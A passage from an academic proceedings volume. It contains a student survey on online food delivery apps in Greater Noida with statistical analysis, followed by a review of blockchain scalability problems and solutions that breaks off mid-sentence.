to this study, there are likely chances that the online food ordering market in India
will see a drastic change. This market may grow at over 16 percent annually in India
and by 2023 is likely to touch $ 17.02 billion (The online food ordering market in
India is likely to grow at over 16 per cent annually to touch USD 17.02 billion by
2023. Business Standard, [4]). This research paper will discuss two objectives. The
first objective is to discuss the consumer perception toward this new trend of online
food delivery and ordering services, and the other one is to examine the role of signif-
icant factors on Online Food Ordering Services. The survey was conducted on 216
students of four technical and management institutes in Greater Noida. The main
focus of the research is on carefully studying and analyzing the data which has been

A. Srivastava (B) · A. K. Bhatt


GL Bajaj Institute of Management and Research, PGDM Institute, Greater Noida, India
e-mail: arpita.srivastava@glbimr.org
R. Malhotra · P. Srivastava
Manav Rachna University, Faridabad, India
e-mail: radhika.malhotra@glbimr.org
P. Srivastava
e-mail: priyanka@mru.edu.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 1
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_1

collected from all the users in Greater Noida who are using the online food ordering
apps and delivery services. Four parameters have been taken into consideration for
analyzing positioning study (perceptual mapping).

Keywords Cloud kitchen · Consumer perception · Online food delivery service ·


Mobile application · Key success factors

1 Introduction

The views of people regarding the online purchase of food are changing very fast.
E-commerce and e-businesses, with their technological advantage, are offering hassle-free
and quick food deliveries to consumers [5]. In today’s age of advanced information
and technology, consumer perception is being molded, increasingly in favor of
online food delivery.
Indians have accepted the new trend of ordering food via apps, which puts delivery at
the convenience of their fingertips [6]. One of the explanations behind this new trend
may be time constraints and the hectic corporate lifestyle, which have given a boost to
online food delivery services. Added to this is the comfort of ordering food from
a variety of restaurants on a mobile phone (Figs. 1 and 2).

2 Literature Review

Sethu and Saini (2016), in their paper titled “Customer Perception and Satis-
faction on Ordering Food via Internet” (with special relevance to Manipal Univer-
sity), highlighted that online ordering of food saves a lot of time, thereby helping

Fig. 1 Segment overview: global segment sizes. Source Statista Digital Market Outlook (2018)

Fig. 2 Food delivery market and its potential [7]

the scholars to manage their time proficiently [8]. The researchers and students
have the option to order their preferred food from a preferred location at a preferred
time. Furthermore, the study reveals that almost all the respondents use the
Internet on their phones or computers, and a significant proportion of the respondents
ordered food twice or at least once per week. Recently, some researchers have
also discovered that the Web environment offers ample opportunities for interactive
and individualized selling (Burke, 2002; Wind & Rangaswamy, 2001). According
to one study, as compared to the offline environment, the online environment offers more
opportunities for personalized and interactive marketing. Furthermore, Phau and Lo
(2004) state that the Internet also offers an impulsive shopping channel to consumers.
Consumers can now effortlessly search the Web for various competing sellers and
products that match their expectations (Singh, 2002). Social media also plays a
role in purchase decisions. Consumers receive input and feedback from
family, friends, and also from peers via various social media channels such as Insta-
gram, public forums, Facebook, blogs, and Twitter (Herring et al., 2005; Bernoff &
Li, 2008).
Web site quality is also considered an important cue for customer satis-
faction [9]. In the last decade, the literature on Web sites has therefore grown
substantially, and Web site quality is regarded as an important factor driving
purchase intention. Many factors are taken into consideration to improve Web
site quality. Some of the important factors
include customization, cultivation, choice, interactivity, care, character, community,
convenience, and user-friendliness (Srinivasan et al. 2002); Huang, 2003, also added
complexity, novelty, and interactivity. Furthermore, according to Wirtz and Lihotzky,
2003, the factors like technical integration, individualization, free services, conve-
nience, and community also play important roles. (Chiu et al. 2005) emphasized that

data quality, interactivity and learning, connectivity and playfulness (Chiu et al. 2005);
quality of the content, appearance, technical adequacy, and specific content (Liao
et al. 2006); communication, design, promotion, merchandising, privacy/security,
and order fulfillment (Jin & Park, 2006); user-friendliness, content quality, transac-
tion speed, and security (Shih & Fang, 2006) are the essential aspects for generating
traffic on the Web site.
Other researchers are of the view that system quality, information quality, and
service quality are the three Web site merits that are expected by the customers to
assist them make online encounters (Shih, 2004).
Additionally, in the online business environment, the Web site design is considered
to be an important factor (Marcus & Gould, 2000), and therefore, the designs by the
businesses are adapted to suit the local values and norms (Gommans et al. 2001).

2.1 Trust and Security

Security and trust are crucial factors for buyers who intend to purchase products
online directly from the shopping Web sites. Because of this reason, security is
considered as one of the primary concerns by consumers who are buying online
products (Flavian et al. 2006). Furthermore, the perceived confidentiality
and security features of Web sites are very important antecedents of trust, which
are responsible for influencing the behavioral intention of consumers (Mukherjee
& Nath, 2007). Therefore, in most of the studies, security and privacy of the Web
portals of the e-commerce companies (e-service providers) are one of the primary
concerns which are addressed on priority by these companies (Sathye, 1999; Liao
& Cheung, 2002; Poon, 2008). Confidentiality, in particular, is considered to be an
important element for creating an online belief and trust in any service organization.

2.2 Web Site Design

(Garrett, 2003) clearly puts forth the concept of Web site design as something which
deals with emotional appeal, aesthetics, uniformity, poise, mix of colors, shapes,
photography, and font style. A few studies (Karvonen, 2000) suggest an association
between trust and the aesthetic beauty of Web sites, and some of them (Wang
& Emurian, 2005) found a noteworthy association between the two. In fact, most of the
empirical studies have shown the positive stance (Tarasewich, 2003), when it comes
to the relationship between Web site aesthetics and enjoyable user experience.

2.3 Payment System

Chen and Chang (2003) state that online shoppers have a very low tolerance for
system feedback. Yet another study says online buyers wait only a few seconds
(eight seconds) before they leave a Web site (Dellaert & Khan, 1999). As per
Weinberg, 2000, factors like loading time, appearance, and functionality are very
important for any webpage. The Web site design should be trustworthy, user-friendly,
and it should save transaction time of the consumers. The consumers may not use
the online payment system of the portal if it is loading slowly, and the design is
not trustworthy. If the Web site of the e-service provider is designed to serve the
purpose of a salesperson, in that case, the Web site should also focus on certain
skills and qualities of salespersons like expertise, likeability, and strong trust (Hawes
et al., 1989; Doney & Cannon, 1997) as these characteristics are surely linked with
trust of the consumer in the salesperson and the company. It may be noted that Web
site design, information quality, security/privacy, and payment system of that Online
Food Ordering Web site play a role in determining customer’s trust in his online
shopping experiences.

2.4 Service Quality

The factor that plays a significant role in generating customer satisfaction is service
quality. In order to measure the loyalty and customer satisfaction, the organiza-
tions are also using yet another important tool called service quality dimensions
(SERVQUAL) tool (Landrum et al., 2009). The concept of service quality dimen-
sions which came into existence in 1988 was introduced by Parasuraman et al. It
is basically a generic instrument which is used for the measurement of service
quality based on the focus group’s inputs. The concept has also been adopted by
many organizations like Web services and libraries (Gede & Sumaedi, 2013; Reichl,
Tuffin & Schatz, 2013; Wang et al., 2014) [10]. According to Juran and Godfrey
(1999), quality is defined as “fitness for use” and “those product features which meet
customer needs and thereby provide customer satisfaction”. However, the definition
of quality may vary depending on whether a transcendent, value-based, manufacturing-
based, product-based, or user-based approach is taken (Garvin, 1984). Rolland
and Freeman (2010) have included the following factors in the concept of service
quality: purchasing of products and services, Web site facilitating effective and effi-
cient shopping, and the type of customer service delivered right from first contact to
fulfillment of the services. Moreover, according to Juga et al. (2010) while service
perceptions influence loyalty, Oliver, 1997, believes that satisfaction represents a
more general evaluative construct than the episodic and transaction-specific nature
of service performance, which mediates the link between service quality and a customer’s
re-purchase loyalty (Olsen, 2002). Providing excellent service to consumers is

the key sustainable strategy for e-commerce and online food delivery compa-
nies. Therefore, online food delivery companies focus more on the perceived quality
of the service, as the good quality service always has a larger impact on customer
satisfaction.
The three major dimensions, on the basis of the above discussions, have been
recognized as crucial for retaining and satisfying the consumers. They are delivery,
quality of food, and customer service.

2.5 Delivery

On-time delivery of products is very essential in today’s e-commerce environment


[11]. It plays a very important role in retaining and satisfying the new and the existing
customers. According to Dholakia and Zhao (2010), on-time delivery has a strong
impact on the relationship between online store features and customer satisfaction
[12]. There will always be a negative impact on customer satisfaction if there is a
delay in delivery of food or products beyond the committed time (e.g., guaranteed
30-minute delivery by some service providers, or delivery within one hour).
Moreover, according to (Dholakia & Zhao, 2010), delivery has an important posi-
tive impact on customer satisfaction. On-time delivery is one of the important order
fulfillment variables that dominates the effects on overall customer satisfaction and
evaluations. Hence, it may be noted that an overall customer satisfaction and loyalty
of consumers in online food delivery business are influenced by on-time delivery.

2.6 Customer Service

Consumers’ perception regarding the organization’s customer service support has a


strong correlation with the possibility of re-purchase (Reibstein, 2002). According to Posselt
and Gerstner (2005), consumer satisfaction with a service will be influenced by the
sequence of service encounters. The customer ratings about the services also play a
role in the purchase decision. Poorly rated Web sites are likely to be ignored
by the buyers. Suleyman’s (2010) findings also echoed the same trend. He observed
that overall online customer satisfaction is dependent on the service quality [13].
Yet another concern of the online consumers is the problem of replacements and the
resolution time of their queries and issues by customer service team. The result of
this research is in line with earlier researchers (Selnes, 1998; Wiertz et al., 2004)
despite a significant debate about the causal ordering between service quality and
satisfaction. Results highlighted that quality of service is a very important antecedent
of satisfaction.

2.7 Food Quality

The food quality is seen to be associated with satisfaction in fast-food restaurants


(Law et al., 2004; Kivela et al., 1999). Though some may argue that food cannot be a
part of service quality, it focuses on the features like well-cooked, healthy, fresh, and
nicely presented food. These are some of the factors that can influence the customers’
satisfaction and their decisions to re-purchase. According to this observation (Kotler,
1991), service also means the benefits or an intangible activity provided by the service
providers to customers, which can be a tangible product and something that is added
to intangible service, or in an independent form.
According to earlier researchers, there are three important factors having a direct
and positive relationship with satisfaction (Qin et al., 2010) [14]. They are food
quality, perceived value, and service quality. In addition, studies conducted by (Para-
suraman et al. 1994; Andaleeb & Conway, 2006) have reported that the quality and
price of the product along with service quality have a larger impact on customer satis-
faction. In addition (Kivela et al., 1999; Law et al., 2004) stated that many studies
which were conducted on fast-food restaurants have shown that quality of food has
a relation with customer satisfaction and it was tested as a possible determinant of
customer satisfaction. It is expected that, in this study as well, there will be a major
relationship between quality of food and customer satisfaction. Hence, it is very
important for the food delivery companies to maintain their food quality as it is one
of the important factors to create customer satisfaction.

2.8 Objectives of the Study

The main objectives of the study are given below.


• To observe consumer perception (here, of the students) toward online food delivery and
ordering services and the key success factors of online food delivery services in
four technical and management institutes in Greater Noida
• To study the student’s perception toward the online food delivery and ordering
services
• To examine the key factors influencing online food ordering services in Greater
Noida.

3 Scope of Study

The most important aim of this study as mentioned above is to know and understand
the consumer perception about the online food delivery and ordering services in
Greater Noida. The study will help us in understanding the “Online Food ordering
and Delivery Service Market”. With this study, we will understand the consumer

perception and key success factors regarding the services various companies provide
in Greater Noida.
Consequently, the findings of this study may also be useful for the online food
delivery companies (online service providers) who after analyzing the results can
work upon on these variables and try to fill up the gaps in the mindset of consumers.

4 Research Methodology

Primary data sources of this study include information collected and processed
directly by the researchers, through questionnaire based on perception of customers
and key success factors for usage of online food delivery apps in Greater Noida.
Secondary data collection includes information from various apps, Internet, jour-
nals, magazines, and research reports. Investigation and observation of the collected
data were done with the help of computational, mathematical, and statistical tools and
techniques. A well-designed and structured questionnaire with both open-ended and
close-ended questions was prepared.
Questionnaire: The section I of the questionnaire had relevant questions related to
demographic factors like gender, age, and university/college of the students who
willingly accepted to fill the form.
Second section of the questionnaire sheds light on the questions about students’
experience while ordering online food and about the factors affecting their buying
behavior.
Sample Size: 216 respondents (Students).
Research Tools: Following are the research tools which are used to draw conclusions
and to do analysis.
• Cronbach alpha
• Chi square
• Weighted average
• Descriptive analysis; multi-item scales (five-point, Likert type) ranging from
strongly agree (5) to strongly disagree (1) are used.

Sampling:
Survey was conducted in four technical and management institutes in Greater Noida.
Non-probability: Convenience sampling method was used.

Hypothesis: H0: No internal consistency exists among the four factors considered
for the usage of online food delivery app.

H1: There exists an internal consistency among the four factors considered for
the usage of online food delivery app.

5 Analysis and Interpretation

Table 1 is presented to understand the behavior of students about the use of online
food delivery apps, and socioeconomic characteristics of the consumers were studied.
These variables are taken into consideration as they affect the consumption pattern
and consumer behavior regarding the usage of food delivery apps. Students were
asked to fill the questionnaire. The demographic profile of the respondents is
represented in the following table.
Users—Food delivery and ordering services apps (Graph 1; Fig. 3):
Interpretation: Analysis of the data shows that 87% of the respondents were using
online apps for ordering food. There were a total of 216

Table 1 Demographic profile

Variables                                  No. of respondents    Percentage (%)
Gender
Male                                       118                   55
Female                                     98                    45
Total                                      216                   100
Age
20–25 years                                185                   86
25–30 years                                27                    12
30–35 years                                3                     2
35 years and above                         1                     0
Total                                      216                   100
Profession
Self-employed                              17                    8
Students (not working)                     177                   82
Working                                    22                    10
Total                                      216                   100
Expenditure in a month (food ordering)
Less than 1000                             26                    12
1000–1500                                  95                    44
1500–2000                                  43                    20
2000–2500                                  29                    13
More than 2500                             23                    11
Total                                      216                   100

Fig. 3 Perceptual mapping (Number of restaurants and speed of delivery)

Graph 1 Usage of online food ordering and delivery apps

respondents, and 189 of them were using the online services. However, 27 respon-
dents (13%) revealed that they are not very keen and are not using the online services
for food delivery.

5.1 Perceptual Map

It is basically a diagrammatic technique used by marketers to show the perceptions
of customers or potential customers with respect to different factors. We have used two
major factors (number of restaurants available and speed of delivery) to understand
the positioning of various brands in the minds of customers.
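A map of this kind can be produced by plotting each brand’s mean rating on the two chosen attributes. The short Python sketch below (using matplotlib) illustrates one way of doing so; the brand coordinates are assumed placeholder values, not the actual survey means behind Fig. 3.

# Illustrative sketch: the coordinates are placeholder ratings, not the survey means.
import matplotlib.pyplot as plt

# Hypothetical mean ratings (1-5 Likert scale): (number of restaurants, speed of delivery)
brands = {
    "Zomato": (4.5, 4.4),
    "Swiggy": (3.8, 3.9),
    "Food Panda": (3.0, 3.6),
    "Uber Eats": (2.2, 2.5),
}

fig, ax = plt.subplots()
for name, (restaurants, speed) in brands.items():
    ax.scatter(restaurants, speed)
    ax.annotate(name, (restaurants, speed), xytext=(5, 5), textcoords="offset points")

# Cross-hairs at the scale midpoint divide the map into four quadrants
ax.axhline(3, linestyle="--", linewidth=0.8)
ax.axvline(3, linestyle="--", linewidth=0.8)
ax.set_xlabel("Number of restaurants available")
ax.set_ylabel("Speed of delivery")
ax.set_title("Perceptual map of food delivery apps (illustrative)")
plt.show()

Brands falling in the upper-right quadrant are perceived as strong on both dimensions, which is how Zomato’s position is read off Fig. 3.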

Interpretation:
The above analysis clearly depicts that Zomato has a strong position in terms of
“Availability of Restaurants” and “Highest Speed of Delivery” in Greater Noida.
The position of Swiggy is good on both parameters. Food Panda has good positioning
on delivery, but for discounts, its position is average. Uber Eats needs to evolve in this
area as Zomato, Swiggy, and Food Panda are the prominent players in the market in
Greater Noida.

5.2 Usage of Food Delivery and Ordering Apps

Usage of Apps    Number    Percentage (%)
Zomato 127 68%
Food Panda 32 17%
Swiggy 25 14%
Uber Eats 5 1%
Total 189 100

Conclusion from the above analysis: We can clearly analyze that Zomato is the
most preferred app followed by Food Panda and Swiggy.

5.3 Factors Affecting Usage of the Food Delivery Apps

Interpretation:
From the above graph, we can see that for Zomato, its user-friendly app acts
as the major factor influencing usage, followed by 24*7 availability. For Food
Panda, customers prefer the app for the discounts offered, in addition to
its user-friendly app and 24*7 availability (Graph 2).
Chi-squared test between factors:
The four factors considered during the analysis are as follows; an illustrative sketch
of how such a test could be run on the survey responses is given after the list.

Graph 2 Major factors and its effect on the usage of food delivery apps

• User-friendly app
• 24*7 availability
• Mode of payment
• Discount offered.
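As an illustration of how the chi-squared test named above could be applied, the Python sketch below (using scipy) tests whether the most influential factor is independent of the app a respondent prefers. The contingency counts are assumed for illustration only; they are not the study’s survey data.

# Illustrative sketch: hypothetical counts of respondents by preferred app (rows)
# and by the factor they named as most influential (columns:
# user-friendly app, 24*7 availability, mode of payment, discount offered).
from scipy.stats import chi2_contingency

observed = [
    [58, 34, 20, 15],   # Zomato (hypothetical)
    [ 8,  6,  4, 14],   # Food Panda (hypothetical)
    [ 9,  7,  5,  4],   # Swiggy (hypothetical)
    [ 2,  1,  1,  1],   # Uber Eats (hypothetical)
]

chi2, p_value, dof, expected = chi2_contingency(observed)
print(f"chi-squared = {chi2:.2f}, dof = {dof}, p-value = {p_value:.4f}")
# A p-value below 0.05 would suggest that the factor a respondent values most
# is not independent of the app they prefer.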

Reliability test
Cronbach’s alpha    Cronbach’s alpha on the given items    Number of items (N)
0.852 0.851 4

The scale has an alpha coefficient of 0.852, which suggests a relatively high
internal consistency among the four factors.
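For reference, Cronbach’s alpha for k items is alpha = k/(k - 1) * (1 - sum of the item variances / variance of the total score). The sketch below computes it in Python on a made-up response matrix; it is not the study’s data, which yielded the value of 0.852 reported above.

# Illustrative sketch: Cronbach's alpha for four Likert-type items.
import numpy as np

def cronbach_alpha(items):
    """items: respondents x items matrix of Likert scores (e.g., 1-5)."""
    k = items.shape[1]                          # number of items (here, 4 factors)
    item_vars = items.var(axis=0, ddof=1)       # variance of each item
    total_var = items.sum(axis=1).var(ddof=1)   # variance of the summed scale
    return (k / (k - 1)) * (1 - item_vars.sum() / total_var)

# Hypothetical responses of six students on the four factors
responses = np.array([
    [5, 4, 4, 5],
    [4, 4, 3, 4],
    [5, 5, 4, 4],
    [3, 3, 2, 3],
    [4, 5, 4, 5],
    [2, 3, 2, 2],
])
print(f"Cronbach's alpha = {cronbach_alpha(responses):.3f}")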
Findings
Zomato has a strong position in the minds of consumers on the factors of highest
“Speed of Delivery” and “No. of Restaurants Available”. The strong perception of
the consumer toward speed of delivery is the reason why majority of respondents
decide to choose Zomato over the other apps in Greater Noida.
• Swiggy and Food Panda do not have clear positioning around these factors. They
can map their position on any other factor such as “Discounts Offered” where
Zomato is not preferred choice.
• Uber Eats needs to work hard to expand their market in Greater Noida region and
achieve better responses in near future.
• Zomato is the preferred choice when it comes to online food delivery followed
by Swiggy and Food Panda.
• Consumer preferred Zomato because of its user-friendly app, 24*7 availability,
and easy mode of payment.

6 Conclusion

Greater Noida (Knowledge Park) is a center of educational institutions where
students are busy with their academic engagements. Online food ordering and delivery
help students manage their time better. Food delivery applications have turned
into a major hit among students who have easy access to the Internet, and 44% of the
sample spend Rs 1000–1500 per month on food via online food delivery service
providers.
According to the study, the market for online food ordering services is growing by
leaps and bounds. The students are well versed with the apps available in the market
for instant food delivery. Zomato holds a strong position in the minds of consumers
and is the most preferred brand despite not offering any discounts to consumers.
Food Panda and Swiggy are preferred because of the discounts they offer, but to stay in the
race in the near future, they need to focus on improving their service delivery, the number of
restaurants available, and the user-friendliness of their applications. User-friendly apps in which
orders can be placed easily are liked by the millennial community. However, the major
challenge for the companies lies in how to attract more students as consumers and
provide ease of use of the delivery apps.

A Systematic Review of Blockchain
Technology to Find Current Scalability
Issues and Solutions

Bhargavi K. Chauhan and Dhirenbhai B. Patel

Abstract Blockchain technology has proven the success of its security technology
and the need for transparency of transactions in the present era. This paper covers
an in-depth review of existing blockchain technology and its issues, such as limited
throughput, high latency, and storage constraints. Blockchain technology has different
variants with different consensus mechanisms, methods, and techniques, each with its
own advantages and limitations. In this review, we also study different existing
solutions for the scalability challenge. A large number of blockchain scalability
solutions exist, but to overcome the challenge completely, further research and
more scalability solutions are required.

Keywords Blockchain · Bitcoin · Ethereum · Scalability

B. K. Chauhan (B) · D. B. Patel
Department of Computer Science, Gujarat Vidyapith, Ahmedabad, Gujarat 380014, India
e-mail: 11908903.gvp@gujaratvidyapith.org
D. B. Patel
e-mail: dhiren_b_patel@gujaratvidyapith.org

1 Introduction

Bitcoin, the first application of blockchain technology, is a platform based on a peer-
to-peer network architecture used for exchanging cryptocurrency without a third party,
and it has given an effective solution to the double-spending problem. In the decentralized
network, bitcoin adopted the proof of work (PoW) consensus mechanism for the verification
of new transactions and blocks [1]. Many digital currencies appeared before
bitcoin, but they came with several challenges and never became as popular as bitcoin.
Digital currencies in their initial phase had many problems, and among them the most
critical was the double-spending problem. Satoshi Nakamoto settled this
problem by using a peer-to-peer distributed network and a computational mechanism
that generates a proof of every transaction which can never be changed and remains
in the chain forever. Each transaction contains two requirements for completion: a digitally
signed hash of the previous transaction and the public key of the next owner.
A state transition system is used in the bitcoin ledger to preserve the ownership status of
existing bitcoins, where the new state is the output of a state transition function. Each transaction
contains an input hash and an output hash, where the output hash of a transaction is used only
once as an input in the entire blockchain. If the output of a transaction has not been
referenced before, it is called an unspent transaction output (UTXO), and a referenced
output is called a spent transaction output (STXO). Bitcoin presented proof of
work (incrementing a nonce to produce a hash of the block) based on the SHA-256 hash algorithm
for verification of transactions. A block of bitcoin has a Merkle tree of transaction
hashes [2]. Ethereum is a modified and improved blockchain platform introduced after
bitcoin. It is an open-source platform on which different ecosystems can build decentralized
applications. The unique and very special qualities of blockchain technology were brought
to the technology world by the Ethereum platform. It introduced the proof of stake (PoS)
consensus mechanism, which is more efficient and lower cost compared to the PoW used in
bitcoin. Ethereum created the smart contract concept: a smart contract contains a description
of rules and regulations that reside on the blockchain and is executed only if the rules
prescribed in it are satisfied. The Ethereum virtual machine (EVM) executes all smart contracts,
and no changes are possible after a smart contract is accepted by the blockchain. The Ethereum
platform uses Ether as its currency. Transaction verification takes place through the PoS
consensus mechanism, which modified the Greedy Heaviest Observed Subtree (GHOST)
protocol and uses the Keccak 256-bit hash algorithm [2, 3].
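As a minimal illustration of the proof-of-work idea mentioned above (incrementing a nonce until the SHA-256 hash of the block meets a difficulty target), the sketch below uses Python's hashlib. The block contents and the difficulty of four leading zero hex digits are arbitrary choices for the example, not bitcoin's actual parameters.

```python
import hashlib

def mine(block_header: str, difficulty: int = 4) -> tuple[int, str]:
    """Increment a nonce until the SHA-256 digest starts with `difficulty` zero hex digits."""
    target = "0" * difficulty
    nonce = 0
    while True:
        digest = hashlib.sha256(f"{block_header}|{nonce}".encode()).hexdigest()
        if digest.startswith(target):
            return nonce, digest
        nonce += 1

# Toy header standing in for the real fields (previous hash, Merkle root, timestamp).
nonce, digest = mine("prev_hash|merkle_root|timestamp")
print(nonce, digest)
```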
Blockchain technology has the power to bring transparency to procedures ranging from buying
and selling fresh vegetables to interacting with the government, where a consensus
mechanism is used to verify authenticity. Blockchain records are stored in a
ledger by cryptographic methods, and they are traceable and tamper-free [4]. The technology is not
limited to cryptocurrency; it has also reshaped the technology world with its specific
features. It can convert existing centralized systems into more accurate,
secure, and decentralized systems [5]. The unique side of this technology (cryptographic
security, transparency, anonymity, auditability, and data integrity without
any third party) creates interest in it as a research area. However, it has not grown as it
should have because of its technical and legal limitations. Some limitations
are limited scalability, high latency, storage constraints, limited consensus mechanisms,
lack of governance, high energy consumption, inadequate tooling, and the threat
of quantum computing [6–8]. Bitcoin and the smart contract are innovations of blockchain
technology but can process only a limited number of transactions, and "blockchain scaling"
introduced the third innovation of blockchain technology [9]. Blockchain technology
has gone through the Blockchain 1.0 (bitcoin), Blockchain 2.0 (Ethereum), and Blockchain
3.0 (trying to solve the challenges of blockchain with different solution techniques) generations
[10]. Decentralization, security, and scalability are three important pillars
of blockchain technology and are called the blockchain trilemma. Scalability
is the pillar that affects the growth of blockchain technology the most [11].
Bitcoin and Ethereum process a limited number of transactions, but their popularity
has increased as they include unique features. After bitcoin and Ethereum, the
next generation is trying to solve the limitations of blockchain technology.

2 Scalability Problem Understanding

The block size of bitcoin is only 1 MB, and it can handle fewer than 7 tps (transactions
per second). The Visa payment network can achieve 47,000 tps and at present
handles hundreds of millions of transactions per day. Suppose the size of one transaction
is 300 bytes and bitcoin wants to achieve Visa's level; it would require a throughput
of about 8 GB per block, which would reach roughly 400 TB of data per year. With this storage
requirement, the bitcoin network would support only a few nodes, which leads to a centralized
network and is completely opposite to the decentralized network concept [2]. Bitcoin can process
3–7 tps (transactions per second) with a 1 MB block size, and it takes 10 min to mine a
single block. Ethereum handles 15–20 tps [9], but both look very poor when compared
with the Visa payment network [12]. The performance of blockchain scalability can be
measured by several key metrics such as maximum transactions per second, minimum
confirmation time, and cost per confirmed transaction (CPCT) [13]. The performance
metrics are divided into two categories with different requirements: the overall
performance metrics for users and the detailed performance metrics
for developers. The overall performance metrics for users include transactions
per second, average response delay, transactions per CPU, transactions per memory
second, transactions per disk I/O, and transactions per network. The detailed performance
metrics for developers include peer discovery rate, response rate, transaction
propagation rate, contract execution time, state updating time, and consensus
cost time [14]. Of all these performance metrics, throughput and latency are
the most important ones that directly influence users [15].
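The storage figures quoted above follow from simple arithmetic; the sketch below reproduces them under the stated assumptions of 47,000 tps, 300-byte transactions, and bitcoin's 10-minute block interval.

```python
TPS = 47_000           # Visa-level transactions per second (assumed above)
TX_SIZE = 300          # bytes per transaction (assumed above)
BLOCK_INTERVAL = 600   # seconds per block (bitcoin's 10-minute target)

bytes_per_second = TPS * TX_SIZE
block_size_gb = bytes_per_second * BLOCK_INTERVAL / 1e9
yearly_tb = bytes_per_second * 365 * 24 * 3600 / 1e12

print(f"data rate: {bytes_per_second / 1e6:.1f} MB/s")
print(f"block size: {block_size_gb:.1f} GB per 10-minute block")   # roughly 8 GB
print(f"yearly growth: {yearly_tb:.0f} TB per year")               # roughly 400 TB
```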

3 How the Design of Blockchain Affects Scalability

The ledger type is one parameter that affects blockchain scalability. Based
on the ledger type, the architecture of a blockchain is divided into three parts: single ledger,
multiledger, and interoperability. Ethereum is a single-ledger-based public network
platform. Chain Core, Hyperledger Burrow, Hyperledger Sawtooth, Hydrachain,
Hyperledger Iroha, Burst, NEM, BigchainDB, and MultiChain are single-ledger-based
private network platforms. Quorum and Credits are single-ledger-based hybrid
network platforms. Hyperledger Fabric and Oracle are multiledger-based private
network platforms. Elements, Lisk, and Openchain are interoperability-based private
network platforms [6]. Leader election and transaction serialization play an important
role in the block generation process. Leader election uses three types of mechanisms:
fixed leaders, a single leader, and collective leaders. Hyperledger Fabric has a
fixed set of leader nodes that run the PBFT consensus protocol. In Bitcoin-NG, a
single leader is selected through PoW, and the selected leader verifies transactions until
a new leader is selected. ByzCoin and Solida use a committee election or collective
leader nodes mechanism to reduce the confirmation time [11]. The network
type, leader election mechanism, and ledger type affect the transaction verification
process. In a public network, a large number of nodes verify the transactions, while
in private and consortium networks, only permissioned or a limited number of nodes
verify them. A limited or selected number of nodes completes the transaction
verification process faster than a large number of nodes.

4 Solutions to Scale Blockchain

Blockchain scalability solutions are categorized into three different layers: Layer
0, Layer 1 (on-chain), and Layer 2 (off-chain). The solutions of each layer are divided
into different categories [15].

4.1 Layer 0

Layer 0 has data propagation solutions such as Erlay, Kadcast, Velocity, and
bloXroute. It needs improvement of existing protocols as well as more new
solutions.

4.2 Layer 1 (On-chain) Solutions

The block data category has solutions such as SegWit, Bitcoin-Cash, Compact
block relay, Txilm, CUB, and Jidar [15]. The Big Block solution can increase throughput
and solve some cost issues, but it also increases the probability of orphan blocks and
ultimately increases the maintenance cost of the chain [16]. The digital signature takes up
65% of the transaction space. The SegWit solution stores the digital signature outside
of the block to increase tps; it reduces the transaction size by storing the digital
signature separately from the block. Increasing the block size means more transactions
per block and is useful to improve the performance of blockchain scalability [9].
Segregated Witness (SegWit) also improves the throughput and minimizes the cost,
but it increases code complexity and also takes more time to process a transaction
[16]. The consensus category has solutions such as Bitcoin-NG, Algorand, Snow White,
and Ouroboros. Ouroboros can process 257.6 tps with a 2 min confirmation time, and
Algorand can handle 875 tps with 22 s. These improve the throughput but cannot
solve the scalability challenge completely, and more solutions are needed [15]. The sharding
category has solutions such as Elastico, OmniLedger, RapidChain, and Monoxide [15].

The sharding technique has a parallel transaction verification mechanism in which many trans-
actions are verified at the same time, which improves the performance of the system. Zilliqa
is one solution using the sharding method to improve performance; it handles 1800
nodes with 1218 tps. It does not give a complete solution for scaling the blockchain, but
it shows an improvement when compared with Ethereum, which handles 25,000
nodes with 15–20 tps [9]. The sharding technique uses parallel processing of transactions,
which increases the throughput. The technique also faces some challenges: if an
attacker takes control of a single shard, the data integrity is broken, which
is known as the 1% attack [16].
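A minimal sketch of the parallel verification idea behind sharding is given below: transactions are assigned to shards by hashing their identifiers, and each shard verifies its own subset independently. This is only a toy illustration of the general principle; it does not reproduce Zilliqa's or any other protocol's actual shard assignment or consensus, and the verification rule is a placeholder.

```python
import hashlib
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor

NUM_SHARDS = 4

def shard_of(tx_id: str) -> int:
    """Deterministically map a transaction id to a shard."""
    return int(hashlib.sha256(tx_id.encode()).hexdigest(), 16) % NUM_SHARDS

def verify(tx_id: str) -> bool:
    """Placeholder verification; a real node would check signatures and inputs."""
    return not tx_id.endswith("bad")

transactions = [f"tx{i}" for i in range(20)] + ["tx_bad"]
shards = defaultdict(list)
for tx in transactions:
    shards[shard_of(tx)].append(tx)

# Each shard verifies only its own transactions, in parallel with the others.
with ThreadPoolExecutor(max_workers=NUM_SHARDS) as pool:
    results = {s: list(pool.map(verify, txs)) for s, txs in shards.items()}
print({s: all(r) for s, r in results.items()})
```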
The directed acyclic graph (DAG) category has solutions such as Inclusive, Spectre,
Phantom, Conflux, Dagcoin, IOTA, Byteball, and Nano. All these solutions try
to overcome the scalability problem of blockchain but are not enough to make blockchain
completely scalable. This method has some limitations, and to overcome these challenges
it needs some more solutions [15]. Several solutions use the DAG method; one
of them is Tangle, developed by IOTA, which is a lightweight solution that does not contain
a full copy of the ledger. Bramas, Byteball, and Holochain are also DAG-based
solutions [17]. DAG and blockchain both store transactions in an open ledger,
but the ledger maintenance method is different in the two approaches. The ledger of
a blockchain has blocks that contain headers and transactions. On the other side, a DAG
stores only the account's transaction/balance history. All network nodes verify
the transactions in a blockchain-based platform, while in a DAG-based platform a
transaction is valid if the majority of votes are in favor of that transaction. Decreasing the block
size is the main approach of the DAG technique. Many solutions use this method to scale
blockchain, and a large number of investigations are going on, but a successful investigation
has not been proven yet [12]. DAG-based solutions have ledger security issues, and
the decentralization of this technique is debatable, which may prevent its growth [17].

4.3 Layer 2 (Off-chain) Solutions

The payment channel category has solutions such as the Lightning Network, DarcMatter
Coin (DMC), Raiden Network, and Sprites [15]. The Lightning Network has almost no
transaction fee and waiting time. It increases throughput and also minimizes the cost,
but it is a solution for payment channels with small amounts and transactions; it cannot
process large payments and a variety of transactions [16]. The side-chain category
has solutions such as Pegged Sidechain, Plasma, and Liquidity Network [15]. The Plasma
chain uses a parent–child structure, which also improves the throughput, but verification
of transactions is very expensive in a parent–child structure [16]. The cross-chain
category has solutions such as Cosmos and Polkadot [15]. The off-chain computation
category has solutions such as Truebit and Arbitrum. All these protocols or solutions try
